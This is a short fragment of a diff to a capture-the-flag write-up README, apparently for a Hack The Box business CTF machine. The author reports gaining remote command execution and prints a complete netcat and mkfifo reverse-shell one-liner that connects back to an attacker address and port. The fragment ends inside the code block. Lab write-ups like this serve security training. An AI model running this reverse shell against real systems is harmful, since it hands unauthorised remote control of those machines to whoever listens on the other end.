siddhartharao17/htbbizctf2021/fullpwn/manager-user/README.md

 Perfect!
 Remote Command Execution (RCE) worked.
 I also verified that netcat was available at `/bin/nc`.
 Now all I needed was a reverse shell on the target and my go to cheat sheet for a variety of them is [Pentest Monkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

-I chose to use.
+I chose to use the below.
 Notice the modified IP, port and shell choice.

 ```
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.10 1234 >/tmp/f